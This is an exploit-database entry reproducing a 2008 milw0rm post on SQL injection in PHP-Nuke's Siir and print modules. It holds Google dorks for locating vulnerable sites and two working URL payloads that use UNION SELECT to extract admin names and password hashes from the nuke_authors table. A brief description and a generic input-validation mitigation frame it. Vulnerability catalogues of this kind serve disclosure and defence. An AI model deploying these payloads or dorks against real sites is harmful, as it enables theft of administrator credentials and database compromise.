header-logo
Suggest Exploit
vendor:
PHP-Nuke
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP-Nuke
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
Unknown

PHP-Nuke Siir SQL Injection(id)

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'id' parameter to 'modules.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can allow the attacker to steal sensitive information, modify data, deface the website, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should sanitize all user-supplied input to prevent SQL injection attacks.
Source

Exploit-DB raw data:

###############################################################
#
# PHP-Nuke Siir SQL Injection(id)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: modules-php-name-Siir
#
# all (modules.php?name=xx) subject have secret print and
#
# and cant see op=print but cann- use exploit
#
################################################################
EXPLOIT :

modules.php?name=Siir&op=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202

################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################


==================NOTE===================


###############################################################
#
# PHP-Nuke genaral print SQL Injection(id)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl:"modules.php?name"print
#
# DORK 2 : allinurl:"modules.php?name=Hikaye"
#
# DORK : allinurl:"modules.php?name=Fikralar"
#
# DORK : allinurl:"modules.php?name=bilgi"
#
################################################################
example

http://xxxx/modules.php?name=(xxx subject)&(subject)=exploit

you cant see print id on google becouse all system have secret print and this exploit working simetimes but not always

EXPLOIT :

print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202


################################################################
# S@BUN         i AM NOT HACKER         S@BUN
################################################################

# milw0rm.com [2008-02-21]